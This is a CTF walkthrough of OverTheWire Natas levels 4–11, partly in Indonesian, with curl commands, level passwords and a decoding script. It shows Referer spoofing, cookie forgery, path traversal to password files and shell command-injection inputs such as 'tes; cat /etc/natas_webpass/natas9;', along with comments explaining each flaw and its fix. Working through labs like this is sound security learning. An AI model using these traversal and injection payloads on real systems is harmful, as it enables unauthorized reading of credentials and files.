Some Natas Solving
Ada banyak cara; salah satu yang saya pakai adalah curl.
# curl --help all
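# curl --user "username:password" "https://apalah.com"
# catatan: --user mengirim HTTP Basic auth (hanya base64, bukan enkripsi); lewat http:// kredensial terbaca di jaringan, dan password di command line ikut tersimpan di shell history.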
natas4
# natas4: present a Referer that names natas5. Referer is a client-supplied
# header, so a server that gates access on it is not enforcing access control.
curl -u "natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" \
     -e "http://natas5.natas.labs.overthewire.org/" \
     "http://natas4.natas.labs.overthewire.org"
natas5
# natas5: send a loggedin=1 cookie. Cookie values are chosen by the client;
# presumably the page reads this flag as login state (confirm against the page).
# An unsigned client-side flag like this cannot prove authentication.
curl -b "loggedin=1" \
     -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" \
     "http://natas5.natas.labs.overthewire.org"
natas6
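# natas6: submit the form with the secret value. These notes do not record
# where the secret came from.
# -d already makes curl send a POST, so the explicit -X "POST" is dropped: it was
# redundant, and with -L it would force POST onto every followed redirect.
curl --user "natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1" \
     -d "submit=1&secret=FOEIUWGHFEEUHOFUOIU" \
     "http://natas6.natas.labs.overthewire.org"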
natas7
sintaks GET PHP (parameter `page` di query string)
# natas7: the `page` query parameter is given a ../ chain that resolves to
# /etc/natas_webpass/natas8, i.e. the value appears to be used as a file path
# with no restriction (path traversal). Server-side fix: map `page` to an
# allowlist of known page names instead of passing it to the filesystem.
curl -u "natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" \
     "http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../../etc/natas_webpass/natas8"
natas8
# encode: "syahrul" -> base64 encode -> reverse -> hex
# decode: "3d3d516343746d4d6d6c315669563362" -> hex decode (string) -> reverse -> base64 decode
python2 :
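import base64
import binascii

# natas8: undo the encoding chain noted above (base64 encode -> reverse -> hex)
# in the opposite order: hex decode -> reverse -> base64 decode.
# str.decode('hex') exists only in Python 2; binascii.unhexlify works on 2 and 3.
# The chain is reversible encoding, not encryption, so it does not protect the secret.
encoded_hex = '3d3d516343746d4d6d6c315669563362'
secret = base64.b64decode(binascii.unhexlify(encoded_hex)[::-1])
print(secret.decode('ascii'))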
lalu
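# natas8: submit the form with the secret recovered by the decoding step above.
# -d already makes curl send a POST, so the explicit -X "POST" is dropped: it was
# redundant, and with -L it would force POST onto every followed redirect.
curl --user "natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe" \
     -d "submit=1&secret=oubWYf2kBq" \
     "http://natas8.natas.labs.overthewire.org"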
natas9
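# command injection: fitur "check word in the file" meneruskan input ke perintah shell. Mitigasi: jangan menyusun perintah shell dari input pengguna.
# passwords are always stored in /etc/natas_webpass/natas{N}; known from natas7, but only for natas 1-10 :D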
tes; cat /etc/natas_webpass/natas9;
natas10
# command injection pada fitur "check word in a file"; dua baris berikut adalah bentuk perintah grep yang akhirnya dijalankan
grep -i u /etc/natas_webpass/natas10; # file1
grep -i u /etc/natas_webpass/natas10 file1
# -> grep dengan dua argumen file mencari kata (mis. "syah") di file1 & file2
natas11
# natas11: fetch the level's published source view (index-source.html).
curl -u "natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK" \
     "http://natas11.natas.labs.overthewire.org/index-source.html"